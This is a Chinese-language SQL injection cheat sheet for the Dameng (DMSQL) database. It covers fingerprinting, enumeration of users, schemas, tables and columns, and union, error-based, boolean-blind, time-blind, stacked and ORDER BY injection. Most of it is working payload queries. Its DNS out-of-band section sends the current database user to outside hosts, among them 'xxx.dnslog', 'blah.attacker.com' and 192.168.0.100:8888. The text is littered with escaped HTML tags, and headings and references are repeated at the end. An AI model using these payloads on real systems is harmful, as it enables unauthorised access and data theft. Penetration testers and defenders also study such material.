达梦数据库DMSQL SQL注入技术详解<\/h1>

0x01 达梦数据库识别<\/h2>
判断是否使用达梦数据库(DMSQL)的方法：<\/p>
报错信息中包含：dm.jabc.driver.DMException<\/code><\/li>
不支持updatexml<\/code>等Oracle特有函数<\/li>
<\/ul>
0x02 基础语法<\/h2>
基本查询<\/h3>
select<\/span> user<\/span> -- 返回当前用户(默认SYSDBA)
<\/span><\/span><\/span><\/span>select<\/span> user<\/span>() -- 同上
<\/span><\/span><\/span><\/span>select<\/span> cur_database -- 返回当前库名(默认DAMENG)
<\/span><\/span><\/span><\/span>select<\/span> cur_database() -- 同上
<\/span><\/span><\/span><\/span>select<\/span> 1<\/span> -- 可以不跟表名，存在默认表dual
<\/span><\/span><\/span><\/span>select<\/span> 1<\/span> from<\/span> dual where<\/span> 1<\/span> =<\/span> 1<\/span> &&<\/span> 1<\/span> =<\/span> 1<\/span> -- &&可以代替and，但||不能代替or
<\/span><\/span><\/span><\/code><\/pre>注释语法<\/h3>
SELECT<\/span> 1<\/span>; -- 单行注释
<\/span><\/span><\/span><\/span>select<\/span> 1<\/span> \/*aaa*\/<\/span> from<\/span> dual -- 支持多行注释
<\/span><\/span><\/span>-- 不支持#单行注释和\/*! *\/内联注释
<\/span><\/span><\/span><\/code><\/pre>运算符<\/h3>

&&<\/code> 可以代替 AND<\/code><\/li>
||<\/code> 不能代替 OR<\/code><\/li>
<\/ul>
0x03 函数特性<\/h2>
常用函数<\/h3>
md5(1<\/span>) -- 返回0xC4CA4238A0B923820DCC509A6F75849B
<\/span><\/span><\/span><\/span>exp(if<\/span>(1<\/span>=<\/span>1<\/span>,710<\/span>,1<\/span>)) -- 整数溢出错误，可用于布尔盲注
<\/span><\/span><\/span><\/span>exp(710<\/span>) -- 返回整数溢出错误
<\/span><\/span><\/span><\/code><\/pre>进制转换<\/h3>
ASCII(str) -- 返回字符串第一个字符的ASCII值
<\/span><\/span><\/span><\/span>CHAR(num) -- 返回参数num对应的ASCII字符
<\/span><\/span><\/span><\/span>CHR(num) -- 同上
<\/span><\/span><\/span><\/span>HEX(str) -- 返回16进制字符串形式
<\/span><\/span><\/span><\/span>UNHEX(str) -- 返回对应的字符串
<\/span><\/span><\/span><\/code><\/pre>字符串截取<\/h3>
substring<\/span>('1234'<\/span>,2<\/span>,1<\/span>) -- 同substr函数
<\/span><\/span><\/span><\/span>substr('1234'<\/span>,2<\/span>,1<\/span>) -- 返回2
<\/span><\/span><\/span>-- 多种格式: 
<\/span><\/span><\/span>-- SUBSTR(str,pos)、SUBSTR(str FROM pos)、SUBSTR(str,pos,len)、SUBSTR(str FROM pos FOR len)
<\/span><\/span><\/span><\/span>left<\/span>('123456'<\/span>,3<\/span>) -- 返回123
<\/span><\/span><\/span><\/span>right<\/span>('123456'<\/span>,3<\/span>) -- 返回456
<\/span><\/span><\/span><\/code><\/pre>字符串拼接<\/h3>
||<\/span> -- 将左右两侧字符串进行连接
<\/span><\/span><\/span><\/span>CONCAT(str1,str2...) -- 将多个字符串合并
<\/span><\/span><\/span><\/span>CONCAT_WS(separator,str1,str2...) -- 通过分隔符连接
<\/span><\/span><\/span><\/span>WM_CONCAT(column_name<\/span>) -- 类似GROUP_CONCAT
<\/span><\/span><\/span><\/span>LISTAGG(column_name<\/span>,separator) -- 类似WM_CONCAT，提供更多控制选项
<\/span><\/span><\/span><\/code><\/pre>其他函数<\/h3>
LENGTH<\/span>(str)\/<\/span>LEN(str) -- 返回字符串长度
<\/span><\/span><\/span><\/span>LOWER<\/span>(str)\/<\/span>LCASE(str) -- 转小写
<\/span><\/span><\/span><\/span>UPPER<\/span>(str)\/<\/span>UCASE(str) -- 转大写
<\/span><\/span><\/span><\/span>TO_CHAR(date\/<\/span>time_value,'format'<\/span>) -- 转换为字符类型
<\/span><\/span><\/span><\/span>TO_NUMBER(char_value,'format'<\/span>) -- 转换为数字类型
<\/span><\/span><\/span><\/span>TO_DATE(char_value,'format'<\/span>) -- 转换为日期类型
<\/span><\/span><\/span><\/code><\/pre>0x04 SQL注入获取数据<\/h2>
基本信息查询<\/h3>
-- 查看数据库版本
<\/span><\/span><\/span><\/span>SELECT<\/span> banner FROM<\/span> v$version; -- 多行返回
<\/span><\/span><\/span><\/span>SELECT<\/span> banner FROM<\/span> v$version limit<\/span> 0<\/span>,1<\/span>;
<\/span><\/span>SELECT<\/span> WM_CONCAT(banner) FROM<\/span> v$version; -- 一行显示
<\/span><\/span><\/span><\/span>SELECT<\/span> LISTAGG(banner,', '<\/span>) FROM<\/span> v$version; -- 高版本可用
<\/span><\/span><\/span><\/span>
<\/span><\/span>-- 获取当前用户、当前数据库
<\/span><\/span><\/span><\/span>select<\/span> user<\/span>;
<\/span><\/span>select<\/span> user<\/span>();
<\/span><\/span>SELECT<\/span> user<\/span> FROM<\/span> DUAL;
<\/span><\/span>select<\/span> cur_database;
<\/span><\/span>
<\/span><\/span>-- 获取所有用户名
<\/span><\/span><\/span><\/span>select<\/span> USERNAME from<\/span> SYS.ALL_USERS;
<\/span><\/span>select<\/span> WM_CONCAT(USERNAME) from<\/span> SYS.ALL_USERS;
<\/span><\/span><\/code><\/pre>查询全局变量<\/h3>
SELECT<\/span> NAME,TYPE<\/span>,VALUE FROM<\/span> V$PARAMETER;
<\/span><\/span>SELECT<\/span> VALUE FROM<\/span> V$PARAMETER WHERE<\/span> NAME=<\/span>'SYSTEM_PATH'<\/span>;
<\/span><\/span>SELECT<\/span> NAME,VALUE FROM<\/span> V$PARAMETER WHERE<\/span> name LIKE<\/span> '%INSTANCE%'<\/span>;
<\/span><\/span><\/code><\/pre>常见全局变量：<\/p>

SYSTEM_PATH<\/li>
CONFIG_PATH<\/li>
TEMP_PATH<\/li>
BAK_PATH<\/li>
DFS_PATH<\/li>
INSTANCE_NAME<\/li>
INSTANCE_ADDR<\/li>
PORT_NUM<\/li>
SVR_LOG_NAME<\/li>
TRACE_PATH<\/li>
BCT_PATH<\/li>
<\/ul>
查询系统表<\/h3>

查询库名<\/li>
<\/ol>
select<\/span> NAME,ID from<\/span> SYS.SYSOBJECTS where<\/span> TYPE<\/span>$<\/span>=<\/span>'SCH'<\/span>
<\/span><\/span><\/code><\/pre>
查询表名<\/li>
<\/ol>
select<\/span> NAME,ID from<\/span> SYS.SYSOBJECTS where<\/span> TYPE<\/span>$<\/span>=<\/span>'SCHOBJ'<\/span> and<\/span> SUBTYPE$=<\/span>'UTAB'<\/span> and<\/span> SCHID=<\/span>150995949<\/span>
<\/span><\/span><\/code><\/pre>
查询列名<\/li>
<\/ol>
select<\/span> NAME,TYPE<\/span>$<\/span>,DEFVAL from<\/span> SYS.SYSCOLUMNS where<\/span> ID=<\/span>1078<\/span>
<\/span><\/span><\/code><\/pre>查询视图<\/h3>

查询用户<\/li>
<\/ol>
select<\/span> USERNAME from<\/span> SYS.ALL_USERS
<\/span><\/span><\/code><\/pre>
查询库名<\/li>
<\/ol>
select<\/span> OBJECT_NAME from<\/span> SYS.ALL_OBJECTS where<\/span> OWNER<\/span>=<\/span>'SYSDBA'<\/span> and<\/span> OBJECT_TYPE=<\/span>'SCH'<\/span>
<\/span><\/span><\/code><\/pre>
查询表名<\/li>
<\/ol>
select<\/span> OBJECT_NAME from<\/span> SYS.ALL_OBJECTS where<\/span> OWNER<\/span>=<\/span>'OTHER'<\/span> and<\/span> OBJECT_TYPE=<\/span>'TABLE'<\/span>
<\/span><\/span><\/code><\/pre>
查询列名<\/li>
<\/ol>
select<\/span> OWNER<\/span>,TABLE_NAME<\/span>,SCHEMA_NAME<\/span>,COLUMN_NAME<\/span> from<\/span> SYS.ALL_COL_COMMENTS where<\/span> SCHEMA_NAME<\/span>=<\/span>'OTHER'<\/span> and<\/span> TABLE_NAME<\/span>=<\/span>'xxxxxx'<\/span>
<\/span><\/span><\/code><\/pre>0x05 联合查询注入<\/h2>
order<\/span> by<\/span> num
<\/span><\/span>union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>... -- 注意列数和类型要相同
<\/span><\/span><\/span><\/code><\/pre>0x06 报错注入<\/h2>
除0错误<\/h3>
select<\/span> 1<\/span> from<\/span> dual where<\/span> 1<\/span>=<\/span>1<\/span>\/<\/span>0<\/span>
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span>\/<\/span>if<\/span>(len(user<\/span>)=<\/span>6<\/span>,1<\/span>,0<\/span>) ORDER<\/span> BY<\/span> id DESC<\/span>;
<\/span><\/span><\/code><\/pre>溢出错误<\/h3>
select<\/span> exp(710<\/span>)
<\/span><\/span>select<\/span> exp(if<\/span>(1<\/span>=<\/span>1<\/span>,710<\/span>,1<\/span>)) -- 数据溢出
<\/span><\/span><\/span><\/span>select<\/span> exp(if<\/span>(len(user<\/span>)=<\/span>6<\/span>,710<\/span>,1<\/span>))
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> AND<\/span> 1<\/span>=<\/span>exp(if<\/span>(len(user<\/span>)=<\/span>6<\/span>,710<\/span>,0<\/span>)) ORDER<\/span> BY<\/span> id DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> ORDER<\/span> BY<\/span> id,exp(if<\/span>(len(user<\/span>)=<\/span>6<\/span>,711<\/span>,0<\/span>)) DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> ORDER<\/span> BY<\/span> id DESC<\/span>,exp(if<\/span>(len(user<\/span>)=<\/span>6<\/span>,710<\/span>,0<\/span>));
<\/span><\/span><\/code><\/pre>0x07 布尔盲注<\/h2>
布尔判断函数<\/h3>
if<\/span>(expr,参数<\/span>1<\/span>,参数<\/span>2<\/span>) -- expr成立返回参数1，否则返回参数2
<\/span><\/span><\/span><\/span>CASE<\/span> WHEN<\/span> exp THEN<\/span> state1 ELSE<\/span> state2 END<\/span> -- 同IF
<\/span><\/span><\/span><\/span>DECODE(expr,search1,result1[,search2,result2,...][,default_result]) -- 类似switch case
<\/span><\/span><\/span><\/span>IFNULL(expr1,expr2) -- expr1不为NULL返回expr1，否则返回expr2
<\/span><\/span><\/span><\/span>NULLIF<\/span>(expr1,expr2) -- expr1与expr2不同返回expr1，否则返回NULL
<\/span><\/span><\/span><\/code><\/pre>案例<\/h3>
SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span> AND<\/span> 1<\/span>=<\/span>if<\/span>(len(user<\/span>)=<\/span>6<\/span>,1<\/span>,0<\/span>) ORDER<\/span> BY<\/span> id DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span> AND<\/span> 1<\/span>=<\/span>(case<\/span> when<\/span> len(user<\/span>)=<\/span>4<\/span> then<\/span> 1<\/span> else<\/span> 0<\/span> end<\/span>) ORDER<\/span> BY<\/span> id DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span> AND<\/span> 1<\/span>=<\/span>decode(len(user<\/span>),6<\/span>,1<\/span>,0<\/span>) ORDER<\/span> BY<\/span> id DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span> AND<\/span> 1<\/span>=<\/span>IFNULL(len(user<\/span>)=<\/span>6<\/span>,0<\/span>) ORDER<\/span> BY<\/span> id DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> AND<\/span> 1<\/span>=<\/span>1<\/span> AND<\/span> 1<\/span>=<\/span>NULLIF<\/span>(len(user<\/span>)=<\/span>6<\/span>,0<\/span>) ORDER<\/span> BY<\/span> id DESC<\/span>;
<\/span><\/span><\/code><\/pre>0x08 时间盲注<\/h2>
sleep(n) -- 休眠n秒，不能和select一起用
<\/span><\/span><\/span><\/span>exec<\/span> sleep 5<\/span> -- 延时5s
<\/span><\/span><\/span><\/span>dbms_pipe.receive_message(('a'<\/span>),2<\/span>) -- 可以延时
<\/span><\/span><\/span><\/span>SELECT<\/span> UTL_INADDR.get_host_name('10.0.0.1'<\/span>) FROM<\/span> dual; -- 反查慢可能可用
<\/span><\/span><\/span><\/span>SELECT<\/span> UTL_INADDR.get_host_address('blah.attacker.com'<\/span>) FROM<\/span> dual; -- 正查慢可能可用
<\/span><\/span><\/span><\/span>SELECT<\/span> UTL_HTTP.REQUEST('http:\/\/google.com'<\/span>) FROM<\/span> dual; -- 发送TCP包被拦截或慢
<\/span><\/span><\/span><\/code><\/pre>0x09 DNS外带注入<\/h2>
需要用户有网络访问权限：<\/p>
SELECT<\/span> UTL_INADDR.get_host_address('google.com'<\/span>) FROM<\/span> dual; -- priv
<\/span><\/span><\/span><\/span>SELECT<\/span> UTL_INADDR.get_host_address((select<\/span> user<\/span>)||<\/span>'.xxx.dnslog'<\/span>);
<\/span><\/span>SELECT<\/span> UTL_HTTP.REQUEST('http:\/\/google.com'<\/span>) FROM<\/span> dual;
<\/span><\/span>SELECT<\/span> UTL_HTTP.REQUEST('http:\/\/xxx.dnslog?'<\/span>||<\/span>(select<\/span> user<\/span>)) from<\/span> dual;
<\/span><\/span>select<\/span> utl_http.request('http:\/\/192.168.0.100:8888\/?'<\/span>||<\/span>(select<\/span> user<\/span>)) from<\/span> dual;
<\/span><\/span><\/code><\/pre>0x0A 堆叠注入<\/h2>
在靶场中可能不成功，但实战中可能有效：<\/p>
-- 结合DNS外带
<\/span><\/span><\/span>-- 结合除0报错
<\/span><\/span><\/span><\/code><\/pre>0x0B order by位置注入<\/h2>
位运算符<\/h3>
ORDER<\/span> BY<\/span> id^<\/span>(if<\/span>(1<\/span>=<\/span>2<\/span>,1<\/span>,2<\/span>)
<\/span><\/span>ORDER<\/span> BY<\/span> id^<\/span>(if<\/span>(len(user<\/span>)=<\/span>6<\/span>,1<\/span>,2<\/span>))
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> ORDER<\/span> BY<\/span> id^<\/span>(if<\/span>(1<\/span>=<\/span>2<\/span>,1<\/span>,2<\/span>)) DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> ORDER<\/span> BY<\/span> id^<\/span>(if<\/span>(len(user<\/span>)=<\/span>6<\/span>,1<\/span>,2<\/span>)) DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> ORDER<\/span> BY<\/span> id&<\/span>(if<\/span>(len(user<\/span>)=<\/span>6<\/span>,1<\/span>,2<\/span>)) DESC<\/span>;
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> ORDER<\/span> BY<\/span> id|<\/span>(if<\/span>(len(user<\/span>)=<\/span>6<\/span>,1<\/span>,2<\/span>)) DESC<\/span>;
<\/span><\/span><\/code><\/pre>union利用<\/h3>
(SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> ORDER<\/span> BY<\/span> id) union<\/span> (select<\/span> 1<\/span>,2<\/span>,user<\/span>);
<\/span><\/span>(SELECT<\/span> *<\/span> FROM<\/span> t1 where<\/span> rownum<<\/span>5<\/span> ORDER<\/span> BY<\/span> id,null<\/span>) union<\/span> (select<\/span> 1<\/span>,2<\/span>,user<\/span>);
<\/span><\/span><\/code><\/pre>转化为Where注入<\/h3>
SELECT<\/span> *<\/span> FROM<\/span> xxxx WHERE<\/span> is_delete!=<\/span>'1'<\/span> ORDER<\/span> BY<\/span> id limit<\/span> 0<\/span>,20<\/span>
<\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> xxxx WHERE<\/span> is_delete!=<\/span>'1'<\/span> ORDER<\/span> BY<\/span> (select<\/span> 1<\/span> from<\/span> dual where<\/span> 1<\/span>=<\/span>1<\/span>\/<\/span>(case<\/span> when<\/span> len(user<\/span>)=<\/span>6<\/span> then<\/span> 1<\/span> else<\/span> 0<\/span> end<\/span>)) LIMIT<\/span> 0<\/span>,20<\/span>
<\/span><\/span><\/code><\/pre>0x0C limit注入<\/h2>
可以接堆叠注入<\/p>
参考资源<\/h2>

达梦数据库手工注入笔记: https:\/\/mp.weixin.qq.com\/s\/vWt3aHhji7e64EMGEBXigg<\/li>
达梦技术文档: https:\/\/eco.dameng.com\/document\/dm\/zh-cn\/pm\/logical-structure.html<\/li>
<\/ul>
达梦数据库DMSQL SQL注入技术详解<\/h1>

0x02 基础语法<\/h2>

0x03 函数特性<\/h2>

0x04 SQL注入获取数据<\/h2>

0x06 报错注入<\/h2>

0x07 布尔盲注<\/h2>

0x0B order by位置注入<\/h2>

0x0C limit注入<\/h2> 可以接堆叠注入<\/p>

参考资源<\/h2> 达梦数据库手工注入笔记: https:\/\/mp.weixin.qq.com\/s\/vWt3aHhji7e64EMGEBXigg<\/li> 达梦技术文档: https:\/\/eco.dameng.com\/document\/dm\/zh-cn\/pm\/logical-structure.html<\/li> <\/ul>

0x0C limit注入<\/h2>
可以接堆叠注入<\/p>

参考资源<\/h2>

达梦数据库手工注入笔记: https:\/\/mp.weixin.qq.com\/s\/vWt3aHhji7e64EMGEBXigg<\/li>
达梦技术文档: https:\/\/eco.dameng.com\/document\/dm\/zh-cn\/pm\/logical-structure.html<\/li> <\/ul>
